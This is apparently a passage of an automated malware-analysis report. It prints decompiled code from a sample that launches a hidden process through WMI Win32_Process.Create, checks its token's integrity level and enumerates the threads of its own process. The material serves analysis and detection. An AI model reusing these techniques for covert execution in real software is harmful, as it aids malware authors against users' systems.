				intOrPtr* _v100;
				long _v116;
				char _v120;
				intOrPtr _v132;
				intOrPtr* _v140;
				intOrPtr _v160;
				intOrPtr _v168;
				long _v176;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v196;
				intOrPtr _v204;
				char _v208;
				char _v212;
				intOrPtr* _v224;
				intOrPtr _v228;
				intOrPtr* _v236;
				intOrPtr* _v240;
				void* _v248;
				intOrPtr* _v252;
				intOrPtr _v256;
				intOrPtr* _v264;
				intOrPtr* _v272;
				long _v276;
				char _v280;
				short _v284;
				char _v288;
				short _v292;
				intOrPtr* _v300;
				intOrPtr* _v304;
				void* _v308;
				void* _v312;
				char _v316;
				intOrPtr* _v324;
				intOrPtr* _v336;
				long _v352;
				char _v356;
				intOrPtr* _v360;
				intOrPtr _v376;
				intOrPtr* _v380;
				intOrPtr _v384;
				intOrPtr _v392;
				intOrPtr* _v396;
				char* _t83;
				void* _t85;
				intOrPtr* _t86;
				void* _t87;
				intOrPtr* _t88;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t98;
				intOrPtr* _t99;
				void* _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				void* _t106;
				intOrPtr* _t107;
				intOrPtr* _t110;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				short _t127;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t139;
				intOrPtr* _t140;
				intOrPtr _t142;
				intOrPtr* _t145;
				void* _t148;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t154;
				short _t157;
				char _t158;
				void* _t208;
				intOrPtr _t211;
				intOrPtr* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				intOrPtr* _t219;
				void* _t220;

				_v56 = 0;
				__imp__CoInitializeEx(0, 6); // executed
				_t83 =  &_v76;
				_v76 = 0;
				__imp__CoCreateInstance(0x6f33df9c, 0, 1, 0x6f33decc, _t83); // executed
				if(_t83 < 0) {
					return 0;
				} else {
					_t158 = "voker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x787680
					_t154 = __imp__#2;
					_v116 = 0;
					_t85 =  *_t154(_t158, _t208, _t153);
					_t215 = _t85;
					_t86 = _v100;
					_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))(_t86, _t215, 0, 0, 0, 0, 0, 0,  &_v120); // executed
					__imp__#6(_t215);
					if(_t87 >= 0) {
						_t91 = _v160;
						__imp__CoSetProxyBlanket(_t91, 0xa, 0, 0, 3, 3, 0, 0); // executed
						if(_t91 >= 0) {
							_v176 = 0;
							_t94 =  *_t154(L"Win32_Process");
							_t211 = _t94;
							_t95 = _v196;
							_v168 = _t211;
							_t97 =  *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x18))))(_t95, _t211, 0, 0,  &_v180, 0); // executed
							if(_t97 >= 0) {
								_v208 = 0;
								_t98 =  *_t154(L"Win32_ProcessStartup");
								_t216 = _t98;
								_t99 = _v224;
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x18))))(_t99, _t216, 0, 0,  &_v212, 0);
								__imp__#6(_t216);
								if(_t101 >= 0) {
									_t104 = _v240;
									_v248 = 0;
									_t106 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3c))))(_t104, 0,  &_v248); // executed
									if(_t106 >= 0) {
										_t212 = __imp__#8;
										 *_t212( &_v208);
										_t110 = _v264;
										_v212 = 2;
										_v204 = 1;
										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x14))))(_t110, L"ShowWindow", 0,  &_v212, 0); // executed
										_t113 = _v272;
										_v280 = 0;
										_t115 =  *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x4c))))(_t113, L"Create", 0,  &_v280, 0); // executed
										if(_t115 >= 0) {
											_t118 = _v300;
											_push( &_v312);
											_v312 = 0;
											_push(0);
											_push(_t118);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x3c))))() >= 0) {
												_t217 = E6F33A360(_v228, 0, 0);
												if(_t217 != 0) {
													_t127 = lstrlenW(_t217) + 2;
													__imp__#4(_t217, _t127);
													_t157 = _t127;
													HeapFree(GetProcessHeap(), 0, _t217);
													if(_t157 != 0) {
														 *_t212( &_v288);
														_v292 = 8;
														_t132 = _v336;
														_v284 = _t157;
														 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x14))))(_t132, L"CommandLine", 0,  &_v292, 0);
														_t135 = _v256;
														_t213 = 0;
														if(_v256 != 0) {
															_t148 = E6F33A360(_t135, 0, 0);
															_t220 = _t148;
															if(_t220 != 0) {
																__imp__#2(_t220);
																_t213 = _t148;
																if(_t213 != 0) {
																	_t151 = _v360;
																	_v316 = 8;
																	_v308 = _t213;
																	 *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))(_t151, L"CurrentDirectory", 0,  &_v316, 0);
																}
																HeapFree(GetProcessHeap(), 0, _t220);
															}
														}
														__imp__#8( &_v280);
														_t137 = _v360;
														_v276 = _v352;
														_v284 = 9;
														_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x14))))(_t137, L"ProcessStartupInformation", 0,  &_v284, 0); // executed
														_v352 = 0;
														__imp__#2(L"Create");
														_t218 = _t139;
														_t140 = _v380;
														_t142 =  *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x60))))(_t140, _v352, _t218, 0, 0, _v384,  &_v356, 0);
														_t219 = __imp__#6;
														_v376 = _t142;
														 *_t219(_t218);
														 *_t219(_t157);
														if(_t213 != 0) {
															 *_t219(_t213);
														}
														if(_v384 >= 0) {
															_t145 = _v396;
															 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 8))))(_t145);
															_v392 = 1;
														}
													}
												}
												_t124 = _v324;
												 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
											}
											_t121 = _v312;
											 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))(_t121);
										}
										_t116 = _v304;
										 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 8))))(_t116);
										_t211 = _v284;
									}
									_t107 = _v252;
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
								}
								_t102 = _v236;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
							}
							__imp__#6(_t211);
						}
						_t92 = _v192;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
					}
					_t88 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
					return _v132;
				}
			}































































































                                                                                                                        0x6f3329dc
                                                                                                                        0x6f3329e0
                                                                                                                        0x6f3329e6
                                                                                                                        0x6f3329f8
                                                                                                                        0x6f3329fc
                                                                                                                        0x6f332a04
                                                                                                                        0x6f332d42
                                                                                                                        0x6f332a0a
                                                                                                                        0x6f332a0a
                                                                                                                        0x6f332a11
                                                                                                                        0x6f332a19
                                                                                                                        0x6f332a1d
                                                                                                                        0x6f332a29
                                                                                                                        0x6f332a2b
                                                                                                                        0x6f332a37
                                                                                                                        0x6f332a3c
                                                                                                                        0x6f332a44
                                                                                                                        0x6f332a4a
                                                                                                                        0x6f332a59
                                                                                                                        0x6f332a61
                                                                                                                        0x6f332a6c
                                                                                                                        0x6f332a70
                                                                                                                        0x6f332a79
                                                                                                                        0x6f332a7b
                                                                                                                        0x6f332a87
                                                                                                                        0x6f332a8b
                                                                                                                        0x6f332a8f
                                                                                                                        0x6f332a9a
                                                                                                                        0x6f332a9e
                                                                                                                        0x6f332aa7
                                                                                                                        0x6f332aa9
                                                                                                                        0x6f332ab5
                                                                                                                        0x6f332aba
                                                                                                                        0x6f332ac2
                                                                                                                        0x6f332ac8
                                                                                                                        0x6f332ad1
                                                                                                                        0x6f332adc
                                                                                                                        0x6f332ae0
                                                                                                                        0x6f332ae6
                                                                                                                        0x6f332af1
                                                                                                                        0x6f332af3
                                                                                                                        0x6f332afd
                                                                                                                        0x6f332b08
                                                                                                                        0x6f332b1b
                                                                                                                        0x6f332b1d
                                                                                                                        0x6f332b28
                                                                                                                        0x6f332b37
                                                                                                                        0x6f332b3b
                                                                                                                        0x6f332b41
                                                                                                                        0x6f332b49
                                                                                                                        0x6f332b4a
                                                                                                                        0x6f332b50
                                                                                                                        0x6f332b51
                                                                                                                        0x6f332b59
                                                                                                                        0x6f332b6b
                                                                                                                        0x6f332b72
                                                                                                                        0x6f332b7f
                                                                                                                        0x6f332b84
                                                                                                                        0x6f332b8c
                                                                                                                        0x6f332b95
                                                                                                                        0x6f332b9d
                                                                                                                        0x6f332bb5
                                                                                                                        0x6f332bc2
                                                                                                                        0x6f332bc7
                                                                                                                        0x6f332bcc
                                                                                                                        0x6f332bdb
                                                                                                                        0x6f332bdd
                                                                                                                        0x6f332be1
                                                                                                                        0x6f332be5
                                                                                                                        0x6f332bea
                                                                                                                        0x6f332bef
                                                                                                                        0x6f332bf6
                                                                                                                        0x6f332bf9
                                                                                                                        0x6f332bff
                                                                                                                        0x6f332c03
                                                                                                                        0x6f332c05
                                                                                                                        0x6f332c0f
                                                                                                                        0x6f332c1a
                                                                                                                        0x6f332c29
                                                                                                                        0x6f332c29
                                                                                                                        0x6f332c34
                                                                                                                        0x6f332c34
                                                                                                                        0x6f332bf6
                                                                                                                        0x6f332c3f
                                                                                                                        0x6f332c49
                                                                                                                        0x6f332c4e
                                                                                                                        0x6f332c5d
                                                                                                                        0x6f332c6d
                                                                                                                        0x6f332c74
                                                                                                                        0x6f332c78
                                                                                                                        0x6f332c8e
                                                                                                                        0x6f332c90
                                                                                                                        0x6f332c9d
                                                                                                                        0x6f332ca0
                                                                                                                        0x6f332ca6
                                                                                                                        0x6f332caa
                                                                                                                        0x6f332cad
                                                                                                                        0x6f332cb1
                                                                                                                        0x6f332cb4
                                                                                                                        0x6f332cb4
                                                                                                                        0x6f332cba
                                                                                                                        0x6f332cbc
                                                                                                                        0x6f332cc6
                                                                                                                        0x6f332cc8
                                                                                                                        0x6f332cc8
                                                                                                                        0x6f332cba
                                                                                                                        0x6f332b9d
                                                                                                                        0x6f332cd0
                                                                                                                        0x6f332cda
                                                                                                                        0x6f332cda
                                                                                                                        0x6f332cdc
                                                                                                                        0x6f332ce6
                                                                                                                        0x6f332ce6
                                                                                                                        0x6f332ce8
                                                                                                                        0x6f332cf2
                                                                                                                        0x6f332cf4
                                                                                                                        0x6f332cf4
                                                                                                                        0x6f332cf8
                                                                                                                        0x6f332d02
                                                                                                                        0x6f332d02
                                                                                                                        0x6f332d04
                                                                                                                        0x6f332d0e
                                                                                                                        0x6f332d0e
                                                                                                                        0x6f332d11
                                                                                                                        0x6f332d11
                                                                                                                        0x6f332d17
                                                                                                                        0x6f332d21
                                                                                                                        0x6f332d21
                                                                                                                        0x6f332d23
                                                                                                                        0x6f332d2d
                                                                                                                        0x6f332d3a
                                                                                                                        0x6f332d3a

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F3329E0
                                                                                                                        • CoCreateInstance.OLE32(6F33DF9C,00000000,00000001,6F33DECC,?), ref: 6F3329FC
                                                                                                                        • SysAllocString.OLEAUT32(00787680), ref: 6F332A1D
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332A3C
                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6F332A59
                                                                                                                        • SysAllocString.OLEAUT32(Win32_Process), ref: 6F332A70
                                                                                                                        • SysAllocString.OLEAUT32(Win32_ProcessStartup), ref: 6F332A9E
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332ABA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332AF1
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,74786900,6F3339D7,?,00000000,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 6F332B79
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,-00000002), ref: 6F332B84
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332B8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332B95
                                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000), ref: 6F332BAA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332BB5
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 6F332BF9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332C2D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332C34
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332C3F
                                                                                                                        • SysAllocString.OLEAUT32(Create), ref: 6F332C78
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAA
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAD
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CB4
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332D11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc$Heap$InitProcessVariant$ByteCharMultiWide$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
                                                                                                                        • String ID: CommandLine$Create$CurrentDirectory$ProcessStartupInformation$ShowWindow$Win32_Process$Win32_ProcessStartup
                                                                                                                        • API String ID: 2088563290-1030916257
                                                                                                                        • Opcode ID: 7577d729d9d4b55e9dea5f143240a1e8f47c072405206789162613ba5c2eddbe
                                                                                                                        • Instruction ID: 9e2a923334f07d0e7d1ddaf3872355eef9182f973ed0f6f95c5417562070ed61
                                                                                                                        • Opcode Fuzzy Hash: 7577d729d9d4b55e9dea5f143240a1e8f47c072405206789162613ba5c2eddbe
                                                                                                                        • Instruction Fuzzy Hash: 83B10572A04359AFC710DFA9C884D6BBBEEFFC9654F10890DF549C7210DA35E9018BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333390, Relevance: 19.6, APIs: 13, Instructions: 108memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F333390() {
				intOrPtr _v4;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				void* _v24;
				long _v28;
				int _t25;
				int _t33;
				void* _t56;

				_v12 = 0;
				_v20 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
					return 0;
				} else {
					_v24 = 0;
					_t25 = GetTokenInformation(_v20, 1, 0, 0,  &_v24); // executed
					if(_t25 == 0 && GetLastError() == 0x7a) {
						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
						if(_t56 != 0) {
							_t33 = GetTokenInformation(_v24, 1, _t56, _v28,  &_v28); // executed
							if(_t33 != 0) {
								_v16.Value = 0;
								_v12 = 0x500;
								_v24 = 0;
								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
									if(EqualSid( *_t56, _v24) == 0) {
										_push(_v4);
										_push( *_t56);
										L6F33C384();
									} else {
										_v20 = 1;
									}
								}
								FreeSid(_v24);
							}
							HeapFree(GetProcessHeap(), 0, _t56);
						}
					}
					CloseHandle(_v24);
					return _v16.Value;
				}
			}












                                                                                                                        0x6f3333a2
                                                                                                                        0x6f3333a6
                                                                                                                        0x6f3333b2
                                                                                                                        0x6f3334ae
                                                                                                                        0x6f3333b8
                                                                                                                        0x6f3333cd
                                                                                                                        0x6f3333d1
                                                                                                                        0x6f3333d5
                                                                                                                        0x6f333401
                                                                                                                        0x6f333405
                                                                                                                        0x6f33341d
                                                                                                                        0x6f333421
                                                                                                                        0x6f333438
                                                                                                                        0x6f33343c
                                                                                                                        0x6f333443
                                                                                                                        0x6f33344f
                                                                                                                        0x6f333461
                                                                                                                        0x6f333473
                                                                                                                        0x6f333474
                                                                                                                        0x6f333475
                                                                                                                        0x6f333463
                                                                                                                        0x6f333463
                                                                                                                        0x6f333463
                                                                                                                        0x6f333461
                                                                                                                        0x6f33347f
                                                                                                                        0x6f33347f
                                                                                                                        0x6f33348a
                                                                                                                        0x6f33348a
                                                                                                                        0x6f333490
                                                                                                                        0x6f333496
                                                                                                                        0x6f3334a6
                                                                                                                        0x6f3334a6

                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 6F3333AA
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 6F3333D1
                                                                                                                        • GetLastError.KERNEL32 ref: 6F3333DB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F3333F8
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3333FB
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 6F33341D
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 6F333447
                                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 6F333459
                                                                                                                        • ConvertSidToStringSidA.ADVAPI32(00000000,00000000), ref: 6F333475
                                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 6F33347F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333487
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33348A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333496
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1769087308-0
                                                                                                                        • Opcode ID: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction ID: ee59c0d063054639add101dd8ae4767c52a57c19788051e63e56da3003cdff7a
                                                                                                                        • Opcode Fuzzy Hash: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction Fuzzy Hash: 7F314DB2608355AFD710DF65CC89D5BBBADEF85760F00891DF994C2140D775E8058BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33B0A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106memorynativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B0A0(long* __esi) {
				long _t27;
				int _t28;
				long _t29;
				void _t31;
				long _t34;
				void* _t36;
				void* _t37;
				void* _t40;
				long _t44;
				void* _t52;
				void* _t53;
				void* _t55;
				intOrPtr _t57;
				long* _t58;
				void* _t60;
				long* _t62;

				_t58 = __esi;
				_t62[4] = 0;
				_t27 = NtQuerySystemInformation(5, 0, 0, _t62); // executed
				if(_t27 == 0xc0000004) {
					_t27 =  *_t62;
					if(_t27 != 0) {
						_t28 = VirtualAlloc(0, _t27, 0x1000, 4); // executed
						_t55 = _t28;
						_t62[3] = _t55;
						if(_t55 == 0) {
							L23:
							return _t28;
						}
						_t29 = NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])); // executed
						if(_t29 < 0 || _t62[1] <= 0) {
							L22:
							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
							goto L23;
						} else {
							_t60 = _t55;
							do {
								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
									L19:
									_t31 =  *_t60;
									if(_t31 == 0) {
										break;
									}
									goto L20;
								}
								_t40 = 0;
								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
									goto L19;
								}
								_t8 = _t60 + 0xdc; // 0xdc
								_t62[4] = _t8;
								do {
									_t57 =  *(_t62[4]);
									if(_t57 == GetCurrentThreadId()) {
										goto L17;
									}
									_t34 =  *_t58;
									if(_t34 != 0) {
										_t44 = _t58[1];
										if(_t58[2] < _t44) {
											L16:
											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
											_t58[2] = _t58[2] + 1;
											goto L17;
										}
										_t52 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
										if(_t36 == 0) {
											break;
										}
										_t58[1] = _t58[1] + _t58[1];
										 *_t58 = _t36;
										goto L16;
									}
									_t58[1] = 0x80;
									_t53 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
									_t37 = HeapAlloc(_t53, _t34, 0x200);
									 *_t58 = _t37;
									if(_t37 == 0) {
										break;
									}
									goto L16;
									L17:
									_t62[4] = _t62[4] + 0x40;
									_t40 = _t40 + 1;
								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
								_t55 = _t62[5];
								goto L19;
								L20:
								_t60 = _t60 + _t31;
							} while (_t60 != 0);
							goto L22;
						}
					}
				}
				return _t27;
			}



















                                                                                                                        0x6f33b0a0
                                                                                                                        0x6f33b0ad
                                                                                                                        0x6f33b0b5
                                                                                                                        0x6f33b0bf
                                                                                                                        0x6f33b0c5
                                                                                                                        0x6f33b0ca
                                                                                                                        0x6f33b0db
                                                                                                                        0x6f33b0e1
                                                                                                                        0x6f33b0e3
                                                                                                                        0x6f33b0e9
                                                                                                                        0x6f33b1e1
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1e1
                                                                                                                        0x6f33b0fc
                                                                                                                        0x6f33b103
                                                                                                                        0x6f33b1d0
                                                                                                                        0x6f33b1db
                                                                                                                        0x00000000
                                                                                                                        0x6f33b114
                                                                                                                        0x6f33b115
                                                                                                                        0x6f33b118
                                                                                                                        0x6f33b121
                                                                                                                        0x6f33b1bf
                                                                                                                        0x6f33b1bf
                                                                                                                        0x6f33b1c4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1c4
                                                                                                                        0x6f33b127
                                                                                                                        0x6f33b12c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b132
                                                                                                                        0x6f33b138
                                                                                                                        0x6f33b140
                                                                                                                        0x6f33b144
                                                                                                                        0x6f33b14e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b150
                                                                                                                        0x6f33b154
                                                                                                                        0x6f33b178
                                                                                                                        0x6f33b17e
                                                                                                                        0x6f33b1a5
                                                                                                                        0x6f33b1aa
                                                                                                                        0x6f33b1ad
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1ad
                                                                                                                        0x6f33b180
                                                                                                                        0x6f33b191
                                                                                                                        0x6f33b199
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1a0
                                                                                                                        0x6f33b1a3
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1a3
                                                                                                                        0x6f33b15b
                                                                                                                        0x6f33b162
                                                                                                                        0x6f33b16a
                                                                                                                        0x6f33b170
                                                                                                                        0x6f33b174
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1b0
                                                                                                                        0x6f33b1b0
                                                                                                                        0x6f33b1b5
                                                                                                                        0x6f33b1b6
                                                                                                                        0x6f33b1bb
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1c6
                                                                                                                        0x6f33b1c6
                                                                                                                        0x6f33b1c6
                                                                                                                        0x00000000
                                                                                                                        0x6f33b1cf
                                                                                                                        0x6f33b103
                                                                                                                        0x6f33b0ca
                                                                                                                        0x6f33b1e5

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0B5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6F33B0DB
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 6F33B0FC
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6F33B118
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33B146
                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6F33B16A
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 6F33B191
                                                                                                                        • VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6F33B1DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 494489134-2766056989
